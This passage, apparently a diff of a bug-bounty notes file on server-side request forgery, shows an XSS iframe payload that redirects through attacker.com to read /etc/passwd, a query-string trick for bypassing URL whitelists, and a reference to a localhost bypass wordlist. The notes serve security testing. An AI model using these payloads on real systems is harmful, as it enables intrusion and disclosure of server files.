k2knight/Web-API-Bug-Bounty/Web/SSRF.md

 we can craft our XSS payload with `<iframe src=/api/logout?redirTo=//attacker.com/test.php></iframe>`.
 Now server renders iframe of its own origin gets redirect to attacker server which redirects to `file://etc/passwd`.

+### Whitelist bypass

+If the server puts a whitelist for URLs give a `?` at the end of whitelist URL followed by attacker URL. `url=http://attacker.com?.target.com/` This will bypass if they set `http://*.target`.
+That **?** will break the whitelist and pings to attacker.com

 ## Bypassing restrictions from SSRF

 localhost bypass wordlist